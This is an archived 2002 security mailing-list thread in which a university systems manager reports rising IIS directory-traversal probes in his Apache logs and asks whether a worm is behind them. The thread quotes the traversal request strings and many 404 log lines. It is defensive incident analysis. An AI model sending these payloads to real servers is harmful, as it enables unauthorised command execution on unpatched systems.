[unisog] increasing cmd.exe port 80/tcp probes

Jeff Anderson-Lee jonah at eecs.berkeley.edu
Mon Jun 3 16:38:07 GMT 2002


These probing patterns are IIS Directory Traversal probes, but
they are not indicative of any CodeRed or Nimda varient that I am
aware of.  The CERT Advisories list explicit probe patterns for
these which I am familiar with:

http://www.cert.org/advisories/CA-2001-19.html (CodeRed)
http://www.cert.org/incident_notes/IN-2001-09.html (Code Red II)
http://www.cert.org/advisories/CA-2001-26.html (Nimda)

This appears to be something new, attacking the same security hole.
If you can point to information to the contrary, I'd greatly appreciate
it.

Jeff Anderson-Lee
Systems Manager, Digital Library Project
ERL, University of California at Berkeley

> Hello Jeff,
>
> Others have most probably already responded... this pattern indicative 
> of CodeRed.
>
> At 10:04 AM 6/2/2002 -0700, you wrote:
>
>> Starting on Jan 5, 2002 I've been noticing some particular probes
>> appearing regularly in my apache logs.  There are two patterns of
>> note.  The first is a single probe:
>>
>>    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
>>
>> and the second is a pair of probes:
>>
>>    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
>>    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ 
>> HTTP/1.1"
>>
>> At first, seeing a new host with these one of these probe patterns was a
>> weekly event, then later about once a day.  However in the past 
>> thirty-six
>> hours I've started to see a sudden rise in the incidence of new hosts
>> scanning with the first pattern:
>>
>> dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 
>> -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 
>> 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>>
>>
>> Has anyone else noticed these patterns in their logs?
>> Does anyone know if a virus/worm has been identified with this
>> probing pattern?
>



More information about the unisog mailing list